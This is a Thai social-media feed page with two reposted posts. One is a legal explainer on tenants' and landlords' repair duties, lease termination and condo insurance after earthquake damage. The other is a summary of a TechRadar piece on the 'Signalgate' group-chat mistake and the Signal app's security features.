  • รีโพสต์จากเพจเฟซบุ๊ก Dr.Pete Peerapar “ห้องคอนโดที่เช่าแตกร้าว เสียหาย จนอยู่ไม่ได้ ใครมีหน้าที่ต้องซ่อม และผู้เช่าบอกเลิกสัญญาได้หรือไม่ ?เพื่อน ๆ หลายคนอาจจะสงสัยว่าเหตุการณ์แผ่นดินไหวเมื่อวาน หากห้องที่เราเช่าอยู่เสียหาย แบบนี้เรามีสิทธิอย่างไรบ้างตามกฎหมายมาลองไล่เรียงข้อกฎหมาย และทำความเข้าใจสิทธิของเรากันดูครับ...... สัญญาเช่าเราต้องเข้าใจก่อนว่า #สัญญาเช่า คือ สัญญาที่ฝ่ายหนึ่งเป็นเจ้าของกรรมสิทธิ (ผู้ให้เช่า) ส่งมอบทรัพย์สินที่เช่าให้อีกฝ่าย (ผู้เช่า) #ได้ใช้หรือได้รับประโยชน์ในทรัพย์สิน ในชั่วระยะเวลาอันจำกัด และผู้เช่าตกลงจะจ่ายค่าเช่าให้แสดงว่า สาระสำคัญของสัญญาเช่า คือ การส่งมอบทรัพย์สินให้อีกฝ่ายผู้เช่าได้ใช้ หรือ ได้รับประโยชน์นั่นเองหมายความว่า หากผู้เช่าไม่สามารถใช้ประโยชน์จากทรัพย์สินที่เช่าได้ สัญญาเช่านั้นก็เป็นอันยกเลิกแต่ถ้าเสียหายเพียงบางส่วน แบบนี้ผู้เช่าสามารถขอลดค่าเช่าลงตามส่วน หรือ จะเลิกสัญญาก็ได้ หากไม่สามารถใช้สอยทรัพย์สินที่เช่าได้ตามความมุ่งหมายที่เข้าทำสัญญาเช่าอธิบายแบบภาษาบ้าน ๆ คือกรณีที่ 1 ถ้าคอนโดที่เราเช่าอยู่นั้น พังไปทั้งหมด แบบนี้สัญญาเช่าเลิกทันที เพราะ ทรัพย์สินที่เช่า ไม่เหลืออยู่แล้วกรณีที่ 2 ถ้าคอนโดที่เราเช่าอยู่นั้น แตกร้าว เสียหาย แบบนี้ก็จะต้องพิจารณาก่อนว่า ความเสียหายดังกล่าวสามารถซ่อมแซมแก้ไขได้หรือไม่ถ้าแก้ไขได้ ผู้ให้เช่าก็จะต้องรีบดำเนินการแก้ไขซ่อมแซม เพื่อให้ผู้เช่าสามารถกลับเข้าไปอยู่อาศัยได้ตามปกติ กรณีนี้ก็อาจยังไม่ถึงขั้นที่จะเลิกสัญญากันได้แต่ถ้าแก้ไขไม่ได้ เช่น หน่วยงานราชการประกาศว่าอาคารนี้ไม่ปลอดภัย แม้ห้องจะยังไม่ได้พังไป แต่ผู้เช่าก็ไม่สามารถเข้าไปใช้สอยได้ตามความมุ่งหมาย (เข้าไปอยู่อาศัย) กรณีนี้ ผู้เช่าก็สามารถเลิกสัญญาได้ทันทีทั้งนี้ทั้งนั้น เรื่องความปลอดภัยนี้ คนที่จะบอกว่าปลอดภัยหรือไม่ปลอดภัย ถ้าคู่สัญญาเถียงกันอาจจะหาข้อยุติไม่ได้ คนที่จะช่วยชี้ขาดได้ คือ คนกลางอย่างหน่วยงานราชการ หรือ วิศวกรที่ได้รับใบอนุญาต....... ถ้ายังอยู่ได้ แต่ห้องแตกร้าว แบบนี้ใครต้องจ่ายค่าซ่อมโดยหลักแล้ว ฝ่ายที่ทำให้เกิดความเสียหายจะต้องเป็นผู้จ่ายค่าซ่อม แต่ถ้าเป็นเหตุสุดวิสัย (เหตุที่ไม่มีใครสามารถป้องกันได้) เช่น แผ่นดินไหว แบบนี้จะถือว่าไม่มีฝ่ายใดฝ่ายหนึ่งผิดเลยเราก็จะต้องว่ากันไปตามหลักกฎหมายเรื่องการเช่า ซึ่งแบ่งได้เป็น 2 กรณี ตามความเสียหายที่เกิดขึ้น กรณีแรก ถ้าโดยความจำเป็นและสมควรเพื่อรักษาทรัพย์สินซึ่งเช่า หรือ เรียกง่าย ๆ ว่า ต้องซ่อมใหญ่ เช่น ห้องแตกร้าว เพดานพัง ประตูพัง แบบนี้จะเป็นหน้าที่ของผู้ให้เช่ากรณีที่สอง ถ้าเป็นการบำรุงรักษาตามปกติและเพื่อซ่อมแซมเพียงเล็กน้อย เช่น หลอดไฟขาด ผนังเป็นรอยเล็กน้อย แบบนี้ตามกฎหมายจะเป็นหน้าที่ของผู้เช่าดังนั้น ความเสียหายที่เกิดขึ้นในห้องจากเหตุแผ่นดินไหวเมื่อวาน เราต้องพิจารณากันก่อนว่า เป็นกรณีที่ซ่อมใหญ่ หรือซ่อมเล็ก ถ้าเป็นการซ่อมใหญ่ ผู้ให้เช่าก็จะต้องรับผิดชอบค่าใช้จ่ายทั้งหมด แต่ถ้าเป็นการซ่อมเล็ก แบบนี้ ผู้เช่าก็จะต้องรับผิดชอบค่าใช้จ่ายเอง...... ประกันคอนโด คุ้มครองแผ่นดินไหว หรือไม่ขอแถมเรื่องประกันให้อีกสักเรื่องหลายคอนโด ท่านอาจจะเคยเห็นนิติบุคคลขออนุมัติทำประกันอัคคีภัยไว้ตอนประชุมลูกบ้านส่วนใหญ่ประกันอัคคีภัย หรือ ประกันความเสี่ยงภัยทรัพย์สิน (Industrial All Risk) ที่นิติบุคคลทำนั้น มักจะมีความคุ้มครองในเรื่องความเสียหายอันเนื่องมาจากแผ่นดินไหวอยู่แล้วดังนั้น หากคอนโดเสียหาย แตกร้าว จากเหตุการณ์แผ่นดินไหว ประกันก็จะเป็นผู้รับผิดชอบค่าเสียหายในส่วนนี้ให้ทั้งหมดแต่ท่านเจ้าของห้องอย่าพึ่งดีใจนะครับ เพราะ ที่บอกว่าประกันรับผิดชอบให้นั้น หมายถึง เขารับผิดชอบในส่วนกลางของคอนโดเท่านั้น ไม่รวมถึงความเสียหายในห้องของท่าน เว้นแต่ส่วนที่เป็นโครงสร้างของอาคารเพราะ กรณีทรัพย์สิน หรือเฟอร์นิเจอร์ของท่านเสียหาย หรือบุบสลาย ประกันของส่วนกลางจะไม่คุ้มครองด้วย หากจะได้รับความคุ้มครอง ต้องเป็นกรณีที่ท่านเจ้าของห้องมีการทำประกันภัยในส่วนของท่านเพิ่มเติมอีกกรมธรรม์หนึ่งหลายท่านที่ไม่เคยเห็นความสำคัญของการทำประกัน ก็อาจจะได้ตระหนักถึงความสำคัญเมื่อเกิดเหตุขึ้นนี่แหละครับ....ทั้งหมดที่เล่าไป เป็นเพียงหลักกฎหมายที่เกี่ยวข้องในเบื้องต้น แต่เพื่อน ๆ จะต้องไปดูข้อความโดยละเอียดในสัญญาเช่า และกรมธรรม์ประกันภัย ที่ท่านมีด้วยอีกครั้งที่สำคัญและอยากฝากไว้ คือ ความเข้าอกเข้าใจกันระหว่างผู้เช่าและผู้ให้เช่าในยามที่เกิดเหตุเช่นนี้ เป็นสิ่งสำคัญกว่าการที่เราจะมุ่งเอาชนะกันด้วยข้อกฎหมาย https://www.facebook.com/share/p/16NCZE8YFL/?mibextid=wwXIfr
    รีโพสต์จากเพจเฟซบุ๊ก Dr.Pete Peerapar “ห้องคอนโดที่เช่าแตกร้าว เสียหาย จนอยู่ไม่ได้ ใครมีหน้าที่ต้องซ่อม และผู้เช่าบอกเลิกสัญญาได้หรือไม่ ?เพื่อน ๆ หลายคนอาจจะสงสัยว่าเหตุการณ์แผ่นดินไหวเมื่อวาน หากห้องที่เราเช่าอยู่เสียหาย แบบนี้เรามีสิทธิอย่างไรบ้างตามกฎหมายมาลองไล่เรียงข้อกฎหมาย และทำความเข้าใจสิทธิของเรากันดูครับ......✅ สัญญาเช่าเราต้องเข้าใจก่อนว่า #สัญญาเช่า คือ สัญญาที่ฝ่ายหนึ่งเป็นเจ้าของกรรมสิทธิ (ผู้ให้เช่า) ส่งมอบทรัพย์สินที่เช่าให้อีกฝ่าย (ผู้เช่า) #ได้ใช้หรือได้รับประโยชน์ในทรัพย์สิน ในชั่วระยะเวลาอันจำกัด และผู้เช่าตกลงจะจ่ายค่าเช่าให้แสดงว่า สาระสำคัญของสัญญาเช่า คือ การส่งมอบทรัพย์สินให้อีกฝ่ายผู้เช่าได้ใช้ หรือ ได้รับประโยชน์นั่นเองหมายความว่า หากผู้เช่าไม่สามารถใช้ประโยชน์จากทรัพย์สินที่เช่าได้ สัญญาเช่านั้นก็เป็นอันยกเลิกแต่ถ้าเสียหายเพียงบางส่วน แบบนี้ผู้เช่าสามารถขอลดค่าเช่าลงตามส่วน หรือ จะเลิกสัญญาก็ได้ หากไม่สามารถใช้สอยทรัพย์สินที่เช่าได้ตามความมุ่งหมายที่เข้าทำสัญญาเช่าอธิบายแบบภาษาบ้าน ๆ คือกรณีที่ 1 ถ้าคอนโดที่เราเช่าอยู่นั้น พังไปทั้งหมด แบบนี้สัญญาเช่าเลิกทันที เพราะ ทรัพย์สินที่เช่า ไม่เหลืออยู่แล้วกรณีที่ 2 ถ้าคอนโดที่เราเช่าอยู่นั้น แตกร้าว เสียหาย แบบนี้ก็จะต้องพิจารณาก่อนว่า ความเสียหายดังกล่าวสามารถซ่อมแซมแก้ไขได้หรือไม่ถ้าแก้ไขได้ ผู้ให้เช่าก็จะต้องรีบดำเนินการแก้ไขซ่อมแซม เพื่อให้ผู้เช่าสามารถกลับเข้าไปอยู่อาศัยได้ตามปกติ กรณีนี้ก็อาจยังไม่ถึงขั้นที่จะเลิกสัญญากันได้แต่ถ้าแก้ไขไม่ได้ เช่น หน่วยงานราชการประกาศว่าอาคารนี้ไม่ปลอดภัย แม้ห้องจะยังไม่ได้พังไป แต่ผู้เช่าก็ไม่สามารถเข้าไปใช้สอยได้ตามความมุ่งหมาย (เข้าไปอยู่อาศัย) กรณีนี้ ผู้เช่าก็สามารถเลิกสัญญาได้ทันทีทั้งนี้ทั้งนั้น เรื่องความปลอดภัยนี้ คนที่จะบอกว่าปลอดภัยหรือไม่ปลอดภัย ถ้าคู่สัญญาเถียงกันอาจจะหาข้อยุติไม่ได้ คนที่จะช่วยชี้ขาดได้ คือ คนกลางอย่างหน่วยงานราชการ หรือ วิศวกรที่ได้รับใบอนุญาต.......✅ ถ้ายังอยู่ได้ แต่ห้องแตกร้าว แบบนี้ใครต้องจ่ายค่าซ่อมโดยหลักแล้ว ฝ่ายที่ทำให้เกิดความเสียหายจะต้องเป็นผู้จ่ายค่าซ่อม แต่ถ้าเป็นเหตุสุดวิสัย (เหตุที่ไม่มีใครสามารถป้องกันได้) เช่น แผ่นดินไหว แบบนี้จะถือว่าไม่มีฝ่ายใดฝ่ายหนึ่งผิดเลยเราก็จะต้องว่ากันไปตามหลักกฎหมายเรื่องการเช่า ซึ่งแบ่งได้เป็น 2 กรณี ตามความเสียหายที่เกิดขึ้น กรณีแรก ถ้าโดยความจำเป็นและสมควรเพื่อรักษาทรัพย์สินซึ่งเช่า หรือ เรียกง่าย ๆ ว่า ต้องซ่อมใหญ่ เช่น ห้องแตกร้าว เพดานพัง ประตูพัง แบบนี้จะเป็นหน้าที่ของผู้ให้เช่ากรณีที่สอง ถ้าเป็นการบำรุงรักษาตามปกติและเพื่อซ่อมแซมเพียงเล็กน้อย เช่น หลอดไฟขาด ผนังเป็นรอยเล็กน้อย แบบนี้ตามกฎหมายจะเป็นหน้าที่ของผู้เช่าดังนั้น ความเสียหายที่เกิดขึ้นในห้องจากเหตุแผ่นดินไหวเมื่อวาน เราต้องพิจารณากันก่อนว่า เป็นกรณีที่ซ่อมใหญ่ หรือซ่อมเล็ก ถ้าเป็นการซ่อมใหญ่ ผู้ให้เช่าก็จะต้องรับผิดชอบค่าใช้จ่ายทั้งหมด แต่ถ้าเป็นการซ่อมเล็ก แบบนี้ ผู้เช่าก็จะต้องรับผิดชอบค่าใช้จ่ายเอง......✅ ประกันคอนโด คุ้มครองแผ่นดินไหว หรือไม่ขอแถมเรื่องประกันให้อีกสักเรื่องหลายคอนโด ท่านอาจจะเคยเห็นนิติบุคคลขออนุมัติทำประกันอัคคีภัยไว้ตอนประชุมลูกบ้านส่วนใหญ่ประกันอัคคีภัย หรือ ประกันความเสี่ยงภัยทรัพย์สิน (Industrial All Risk) ที่นิติบุคคลทำนั้น มักจะมีความคุ้มครองในเรื่องความเสียหายอันเนื่องมาจากแผ่นดินไหวอยู่แล้วดังนั้น หากคอนโดเสียหาย แตกร้าว จากเหตุการณ์แผ่นดินไหว ประกันก็จะเป็นผู้รับผิดชอบค่าเสียหายในส่วนนี้ให้ทั้งหมดแต่ท่านเจ้าของห้องอย่าพึ่งดีใจนะครับ เพราะ ที่บอกว่าประกันรับผิดชอบให้นั้น หมายถึง เขารับผิดชอบในส่วนกลางของคอนโดเท่านั้น ไม่รวมถึงความเสียหายในห้องของท่าน เว้นแต่ส่วนที่เป็นโครงสร้างของอาคารเพราะ กรณีทรัพย์สิน หรือเฟอร์นิเจอร์ของท่านเสียหาย หรือบุบสลาย ประกันของส่วนกลางจะไม่คุ้มครองด้วย หากจะได้รับความคุ้มครอง ต้องเป็นกรณีที่ท่านเจ้าของห้องมีการทำประกันภัยในส่วนของท่านเพิ่มเติมอีกกรมธรรม์หนึ่งหลายท่านที่ไม่เคยเห็นความสำคัญของการทำประกัน ก็อาจจะได้ตระหนักถึงความสำคัญเมื่อเกิดเหตุขึ้นนี่แหละครับ....ทั้งหมดที่เล่าไป เป็นเพียงหลักกฎหมายที่เกี่ยวข้องในเบื้องต้น แต่เพื่อน ๆ จะต้องไปดูข้อความโดยละเอียดในสัญญาเช่า และกรมธรรม์ประกันภัย ที่ท่านมีด้วยอีกครั้งที่สำคัญและอยากฝากไว้ คือ ความเข้าอกเข้าใจกันระหว่างผู้เช่าและผู้ให้เช่าในยามที่เกิดเหตุเช่นนี้ เป็นสิ่งสำคัญกว่าการที่เราจะมุ่งเอาชนะกันด้วยข้อกฎหมาย https://www.facebook.com/share/p/16NCZE8YFL/?mibextid=wwXIfr
    Like
    1
    0 Comments 0 Shares 729 Views 0 Reviews
  • Signal แอปแชตที่มีชื่อเสียงด้านความปลอดภัย กลายเป็นข่าวดังเพราะความผิดพลาดในการใช้งานที่เกิดจากมนุษย์ แม้ว่าการเข้ารหัสของ Signal จะป้องกันการเจาะข้อมูลได้ดี แต่กรณีนี้แสดงให้เห็นว่าความปลอดภัยของแอปยังพึ่งพาการใช้งานที่ถูกต้อง ฟีเจอร์อย่างข้อความลบตัวเองและ PIN สามารถเพิ่มการป้องกันได้ แต่ข้อมูลสำคัญควรใช้งานบนแพลตฟอร์มเฉพาะที่ปลอดภัยกว่านี้

    จุดแข็งของ Signal:
    - การเข้ารหัสแบบ end-to-end ช่วยให้เฉพาะผู้ส่งและผู้รับเท่านั้นที่สามารถอ่านข้อความได้ อีกทั้ง Signal ใช้ซอร์สโค้ดแบบเปิด ช่วยให้ตรวจสอบและแก้ไขช่องโหว่ได้รวดเร็ว.

    ข้อผิดพลาดในกรณี Signalgate:
    - นักข่าวไม่ได้แฮกระบบ แต่ถูกเพิ่มเข้ากลุ่มโดยไม่ได้ตั้งใจ ทำให้เห็นข้อความที่ควรเป็นความลับ นี่แสดงให้เห็นว่าความปลอดภัยยังขึ้นอยู่กับผู้ใช้งาน.

    การใช้งานที่เหมาะสม:
    - Signal ถูกออกแบบมาสำหรับการสื่อสารส่วนตัว แต่ไม่เหมาะสำหรับข้อมูลลับทางการหรือข้อมูลที่มีความอ่อนไหวสูงสุด.

    คำแนะนำในการใช้งาน:
    - Signal มีฟีเจอร์เช่น การตั้งค่าข้อความที่ลบตัวเองอัตโนมัติ การซ่อนเบอร์โทร และการตั้งค่า PIN เพื่อป้องกันการเข้าถึงที่ไม่พึงประสงค์.

    https://www.techradar.com/computing/websites-apps/what-is-signal-signalgate-explained
    Signal แอปแชตที่มีชื่อเสียงด้านความปลอดภัย กลายเป็นข่าวดังเพราะความผิดพลาดในการใช้งานที่เกิดจากมนุษย์ แม้ว่าการเข้ารหัสของ Signal จะป้องกันการเจาะข้อมูลได้ดี แต่กรณีนี้แสดงให้เห็นว่าความปลอดภัยของแอปยังพึ่งพาการใช้งานที่ถูกต้อง ฟีเจอร์อย่างข้อความลบตัวเองและ PIN สามารถเพิ่มการป้องกันได้ แต่ข้อมูลสำคัญควรใช้งานบนแพลตฟอร์มเฉพาะที่ปลอดภัยกว่านี้ จุดแข็งของ Signal: - การเข้ารหัสแบบ end-to-end ช่วยให้เฉพาะผู้ส่งและผู้รับเท่านั้นที่สามารถอ่านข้อความได้ อีกทั้ง Signal ใช้ซอร์สโค้ดแบบเปิด ช่วยให้ตรวจสอบและแก้ไขช่องโหว่ได้รวดเร็ว. ข้อผิดพลาดในกรณี Signalgate: - นักข่าวไม่ได้แฮกระบบ แต่ถูกเพิ่มเข้ากลุ่มโดยไม่ได้ตั้งใจ ทำให้เห็นข้อความที่ควรเป็นความลับ นี่แสดงให้เห็นว่าความปลอดภัยยังขึ้นอยู่กับผู้ใช้งาน. การใช้งานที่เหมาะสม: - Signal ถูกออกแบบมาสำหรับการสื่อสารส่วนตัว แต่ไม่เหมาะสำหรับข้อมูลลับทางการหรือข้อมูลที่มีความอ่อนไหวสูงสุด. คำแนะนำในการใช้งาน: - Signal มีฟีเจอร์เช่น การตั้งค่าข้อความที่ลบตัวเองอัตโนมัติ การซ่อนเบอร์โทร และการตั้งค่า PIN เพื่อป้องกันการเข้าถึงที่ไม่พึงประสงค์. https://www.techradar.com/computing/websites-apps/what-is-signal-signalgate-explained
    WWW.TECHRADAR.COM
    Signalgate explained: what is Signal, and how secure is the messaging app?
    How to use Signal properly to keep your chats safe and secure
    0 Comments 0 Shares 311 Views 0 Reviews
More Results